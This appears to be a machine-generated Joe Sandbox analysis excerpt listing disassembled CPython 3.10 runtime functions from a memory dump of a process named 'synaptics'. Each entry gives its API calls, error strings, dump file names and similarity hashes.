                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000004,?), ref: 6C467F1A
                                                                                                                                                                                                      • _PyObject_FastCallDictTstate.PYTHON310(?,?,00000000,?,?,00000004,?), ref: 6C467F30
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C4C8,00000000), ref: 6C467F7B
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(_PyErr_NoMemory,Out of memory and PyExc_MemoryError is not initialized yet), ref: 6C467FA1
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine,?), ref: 6C467FE5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Out of memory and PyExc_MemoryError is not initialized yet, xrefs: 6C467F97
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C467FD9
                                                                                                                                                                                                      • @xJlr, xrefs: 6C467F49
                                                                                                                                                                                                      • _PyErr_NoMemory, xrefs: 6C467F9C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$CallDictErrorFastFatalFuncObjectObject_StringTstatememcpy
                                                                                                                                                                                                      • String ID: @xJlr$Out of memory and PyExc_MemoryError is not initialized yet$_PyErr_NoMemory$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 1171354586-2998500822
                                                                                                                                                                                                      • Opcode ID: f79eea82e2e662c49e02e9434e4cfc6a165f7eb471081e071911678b98f7b2f4
                                                                                                                                                                                                      • Instruction ID: 4ffbf0ebac2d2947ffd42daa03fa1a77a046443d1549d7733626e911586f7c60
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f79eea82e2e662c49e02e9434e4cfc6a165f7eb471081e071911678b98f7b2f4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1641B0727042049BCB14DF69DC80D9ABBF9EB88365F50452AF95997B40E730ED18CBE2
                                                                                                                                                                                                      Function 6C582910 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PySys_Audit.PYTHON310(marshal.dumps,6C6E57E0,?,?), ref: 6C58292C
                                                                                                                                                                                                      • PyErr_NoMemory.PYTHON310 ref: 6C58296A
                                                                                                                                                                                                      • _Py_hashtable_destroy.PYTHON310(?), ref: 6C5829F3
                                                                                                                                                                                                      • _PyBytes_Resize.PYTHON310(?,?), ref: 6C582A12
                                                                                                                                                                                                      • PyErr_NoMemory.PYTHON310 ref: 6C582A48
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,6C73D6C0,unmarshallable object), ref: 6C582A73
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Memory$AuditBytes_ObjectPy_hashtable_destroyResizeStringSys_
                                                                                                                                                                                                      • String ID: marshal.dumps$object too deeply nested to marshal$unmarshallable object
                                                                                                                                                                                                      • API String ID: 2469073421-951871033
                                                                                                                                                                                                      • Opcode ID: 1ce7d0808b447c813872e6b067a99fbd343f3bcf434b9e2482a834eaff3a9d33
                                                                                                                                                                                                      • Instruction ID: 5c49c5adbe228ae051a597e12dbe1a9315b1cbb143f2dbbbf6239fcd3bee492d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ce7d0808b447c813872e6b067a99fbd343f3bcf434b9e2482a834eaff3a9d33
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D741F9716093158BD710DF69DC4096ABBE4FF84368F104A2DF868C7B80E731D9498BD2
                                                                                                                                                                                                      Function 6C553610 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 128COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyList_New.PYTHON310(00000000,00000000,?,00000001,?,?,?,?,?,00000000,?,?,?,6C4DA72B,?,?), ref: 6C553637
                                                                                                                                                                                                      • PyCMethod_New.PYTHON310(6C74DD84,00000000,00000000,00000000,00000001,?,?,?,?,?,00000000,?,?,?,6C4DA72B,?), ref: 6C5536A2
                                                                                                                                                                                                        • Part of subcall function 6C49F090: _PyErr_SetString.PYTHON310(00000000,6C73C9A8,attempting to create PyCMethod with a METH_METHOD flag but no class,00000000,?,00000000,?,?,6C5536A7,6C74DD84,00000000,00000000,00000000,00000001), ref: 6C49F13B
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BFE8,handler must be callable,?,?,?,?,00000001,?,?,?,?,?,00000000), ref: 6C553702
                                                                                                                                                                                                      • PyDict_SetItemString.PYTHON310(?,strict,00000000,?,?,?,?,00000001,?,?,?,?,?,00000000), ref: 6C553717
                                                                                                                                                                                                        • Part of subcall function 6C476DD0: PyUnicode_FromString.PYTHON310(?,?,?,6C55371C,?,strict,00000000,?,?,?,?,00000001,?,?,?,?), ref: 6C476DD7
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(encodings,?,?,?,?,?,?,?,00000001,?,?,?,?,?,00000000), ref: 6C55374A
                                                                                                                                                                                                      • PyImport_Import.PYTHON310(00000000,?,?,?,?,?,?,?,?,00000001,?,?,?,?,?,00000000), ref: 6C553759
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$Err_FromUnicode_$Dict_ImportImport_ItemList_Method_
                                                                                                                                                                                                      • String ID: encodings$handler must be callable$strict
                                                                                                                                                                                                      • API String ID: 2153228253-1476986708
                                                                                                                                                                                                      • Opcode ID: de02bb8881cb112e016d43147948b02fa13f0fadd1e3e0eb21d120a8c9749003
                                                                                                                                                                                                      • Instruction ID: eeb1db16b894f23837428f70dfb5b201cd90a910e67fee950dbb0144fcfea595
                                                                                                                                                                                                      • Opcode Fuzzy Hash: de02bb8881cb112e016d43147948b02fa13f0fadd1e3e0eb21d120a8c9749003
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB4105B1E012028FD7109E65DD41B9677A4AB81338F64077ADC2C4BBD1EB30E915C7E2
                                                                                                                                                                                                      Function 6C583BA0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 91COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C583BBD
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C9A8,00000000), ref: 6C583C11
                                                                                                                                                                                                      • PyModule_GetDict.PYTHON310(?), ref: 6C583C39
                                                                                                                                                                                                      • PyModule_GetName.PYTHON310(?), ref: 6C583C46
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(module '%s' has no __dict__,00000000), ref: 6C583C5A
                                                                                                                                                                                                      • PyDict_SetItemString.PYTHON310(00000000,?,?), ref: 6C583C71
                                                                                                                                                                                                        • Part of subcall function 6C476DD0: PyUnicode_FromString.PYTHON310(?,?,?,6C55371C,?,strict,00000000,?,?,?,?,00000001,?,?,?,?), ref: 6C476DD7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • PyModule_AddObjectRef() first argument must be a module, xrefs: 6C583BD2
                                                                                                                                                                                                      • PyModule_AddObjectRef() must be called with an exception raised if value is NULL, xrefs: 6C583BF3
                                                                                                                                                                                                      • module '%s' has no __dict__, xrefs: 6C583C4F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Module_String$DictDict_FormatFromItemNameObjectSubtypeType_Unicode_
                                                                                                                                                                                                      • String ID: PyModule_AddObjectRef() first argument must be a module$PyModule_AddObjectRef() must be called with an exception raised if value is NULL$module '%s' has no __dict__
                                                                                                                                                                                                      • API String ID: 929140557-3563589167
                                                                                                                                                                                                      • Opcode ID: 74adb7b6b1742b5e896cedafd0181781294ac142fdca602771602d4a8521791a
                                                                                                                                                                                                      • Instruction ID: 6bba4cf3e9d27533bcd4a2e1cef64513bfc756841f0d2989a176f7f4abcd3529
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74adb7b6b1742b5e896cedafd0181781294ac142fdca602771602d4a8521791a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C216A72B45214A7CA00899AAD82E963368DFA237EF044235ED1CDBB91FB21E81543E1
                                                                                                                                                                                                      Function 6C4688B0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(?), ref: 6C4688E8
                                                                                                                                                                                                      • _PyObject_GetMethod.PYTHON310(?,00000000,?), ref: 6C468907
                                                                                                                                                                                                      • _Py_CheckFunctionResult.PYTHON310(?,?,00000000,00000000), ref: 6C4689C3
                                                                                                                                                                                                      • _PyObject_MakeTpCall.PYTHON310(?,?,00000000,00000000,00000000), ref: 6C4689DC
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(00000000), ref: 6C468A0B
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C468A4C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Object_$CallCheckFromFunctionMakeMemoryMethodResultStringUnicode_
                                                                                                                                                                                                      • String ID: @xJlr$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 4186294590-553232970
                                                                                                                                                                                                      • Opcode ID: eea40b2b7208cb2a497577bb2c3db1aad95eda9e48170f32b57296e74384e82f
                                                                                                                                                                                                      • Instruction ID: 8c1fc476bfbdcf6d188c698db49100b08d99001d71008cf789d7f8dff565b576
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eea40b2b7208cb2a497577bb2c3db1aad95eda9e48170f32b57296e74384e82f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F41D2716013019FDB10DE26CC41F9AB7E4BF86319F10462EEC6996B94EB30E919CBD2
                                                                                                                                                                                                      Function 6C5B1280 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyArena_New.PYTHON310 ref: 6C5B1289
                                                                                                                                                                                                        • Part of subcall function 6C586DA0: _PyErr_SetObject.PYTHON310(?,6C73C4C8,00000000), ref: 6C586DD7
                                                                                                                                                                                                      • PySys_Audit.PYTHON310(compile,6C6F4018,?,?), ref: 6C5B12A9
                                                                                                                                                                                                      • _PyArena_Free.PYTHON310(00000000), ref: 6C5B130A
                                                                                                                                                                                                      • _PyArena_Free.PYTHON310(00000000), ref: 6C5B131E
                                                                                                                                                                                                      • _PyAST_Compile.PYTHON310(00000000,?,?,?,00000000), ref: 6C5B1336
                                                                                                                                                                                                      • _PyArena_Free.PYTHON310(00000000), ref: 6C5B1341
                                                                                                                                                                                                        • Part of subcall function 6C598B30: PyType_FromModuleAndSpec.PYTHON310(00000000,6C74E0B0,00000000,00000000,?,?,6C5B12F5), ref: 6C598B59
                                                                                                                                                                                                        • Part of subcall function 6C598B30: PyObject_SetAttrString.PYTHON310(?,_fields,?,?,?,6C5B12F5), ref: 6C598B85
                                                                                                                                                                                                        • Part of subcall function 6C598B30: PyObject_SetAttrString.PYTHON310(?,__match_args__,?,?,?,?,?,?,6C5B12F5), ref: 6C598B9E
                                                                                                                                                                                                        • Part of subcall function 6C598B30: PyObject_SetAttrString.PYTHON310(?,_attributes,?,?,?,?,?,?,?,?,?,6C5B12F5), ref: 6C598BB7
                                                                                                                                                                                                      • _PyArena_Free.PYTHON310(00000000), ref: 6C5B1353
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Arena_$Free$AttrObject_String$AuditCompileErr_FromModuleObjectSpecSys_Type_
                                                                                                                                                                                                      • String ID: compile
                                                                                                                                                                                                      • API String ID: 1862723730-1738237498
                                                                                                                                                                                                      • Opcode ID: ca61e13303b4202cc2c0aedcf9c983c7a6a3ed92b0636ab71d3dc8f4bb7be226
                                                                                                                                                                                                      • Instruction ID: c9fde5c6a3481375f0771665e2a3051ef39f1fca9c984247ca1873cf23d93c31
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca61e13303b4202cc2c0aedcf9c983c7a6a3ed92b0636ab71d3dc8f4bb7be226
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D21B3B7B02124579B109A69AC418AF7B69DFC15AEF140175ED0CE7B00FB31DD2982E2
                                                                                                                                                                                                      Function 6C586F10 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 134COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C4C8,00000000), ref: 6C586FA8
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(_PyErr_NoMemory,Out of memory and PyExc_MemoryError is not initialized yet), ref: 6C586FD7
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\listobject.c,00000150), ref: 6C587056
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Out of memory and PyExc_MemoryError is not initialized yet, xrefs: 6C586FCD
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C58704A
                                                                                                                                                                                                      • _PyErr_NoMemory, xrefs: 6C586FD2
                                                                                                                                                                                                      • D:\a\1\s\Objects\listobject.c, xrefs: 6C587045
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ErrorFatalFormatFuncObject
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\listobject.c$Out of memory and PyExc_MemoryError is not initialized yet$_PyErr_NoMemory
                                                                                                                                                                                                      • API String ID: 1264414676-2675033868
                                                                                                                                                                                                      • Opcode ID: a23ae2b9a2e3d3e4168bbf31a6898f1938715b08787899d38e56ee010430840d
                                                                                                                                                                                                      • Instruction ID: f24edd6481a1ef589f1ccc4f5df796b7175a7d86a13e0e446c44a38e94fcaab5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a23ae2b9a2e3d3e4168bbf31a6898f1938715b08787899d38e56ee010430840d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF41D0727112109FDB14CF69DC80A56B7E5EF85379B248669F92CCBB91DB30E805CB90
                                                                                                                                                                                                      Function 6C586DA0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 93COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C4C8,00000000), ref: 6C586DD7
                                                                                                                                                                                                      • PyList_New.PYTHON310(00000000), ref: 6C586E4E
                                                                                                                                                                                                      • PyErr_NoMemory.PYTHON310 ref: 6C586E8C
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(_PyErr_NoMemory,Out of memory and PyExc_MemoryError is not initialized yet), ref: 6C586EA9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ErrorFatalFuncList_MemoryObject
                                                                                                                                                                                                      • String ID: @xJlr$Out of memory and PyExc_MemoryError is not initialized yet$_PyErr_NoMemory
                                                                                                                                                                                                      • API String ID: 2368835009-3203586370
                                                                                                                                                                                                      • Opcode ID: 18a89c50c47fb4b9175b3acee4d9a699338f9e11427759194b605b8cdef666c7
